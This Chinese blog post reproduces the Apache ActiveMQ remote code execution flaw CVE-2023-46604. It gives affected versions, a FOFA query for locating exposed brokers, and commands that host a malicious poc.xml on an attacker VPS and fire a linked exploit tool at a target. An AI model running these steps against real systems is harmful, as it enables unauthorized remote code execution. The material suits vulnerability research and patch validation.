Apache ActiveMQ RCE漏洞(CVE-2023-46604)复现

admin 2024年11月11日20:53:05评论41 views字数 704阅读2分20秒阅读模式

一、Apache ActiveMQ简介

Apache ActiveMQ是一个开源的、功能强大的消息代理(Message Broker),由 Apache Software Foundation 所提供。ActiveMQ 支持 Java Message Service(JMS)1.1 和 2.0规范,提供了一个高性能、简单、灵活和支持多种语言(Java, C, C++, Ruby, Python, Perl等)的消息队列系统

二、漏洞影响版本

Apache ActiveMQ < 5.18.3

Apache ActiveMQ < 5.17.6

Apache ActiveMQ < 5.16.7

Apache ActiveMQ < 5.15.16

三、FOFA语法

app="APACHE-ActiveMQ" && port="61616"

四、漏洞复现

1.漏洞工具下载

https://github.com/sule01u/CVE-2023-46604

2.进入目录

cd CVE-2023-46604

3.将poc.xml部署到http服务(Deploy on your vps)

python3 -m http.server

4.发送poc

python3 CVE-2023-46604.py -i target_ip -p target_port --xml http://vps_ip:8000/poc.xml

你可以通过修改poc.xml中的rce命令来做不同的验证
5.利用漏洞进行成功dnslog回显,确认漏洞真实存在,dnslog平台地址

http://www.dnslog.cn

原文始发于微信公众号(网络安全学习爱好者):Apache ActiveMQ RCE漏洞(CVE-2023-46604)复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月11日20:53:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache ActiveMQ RCE漏洞(CVE-2023-46604)复现https://cn-sec.com/archives/3380488.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息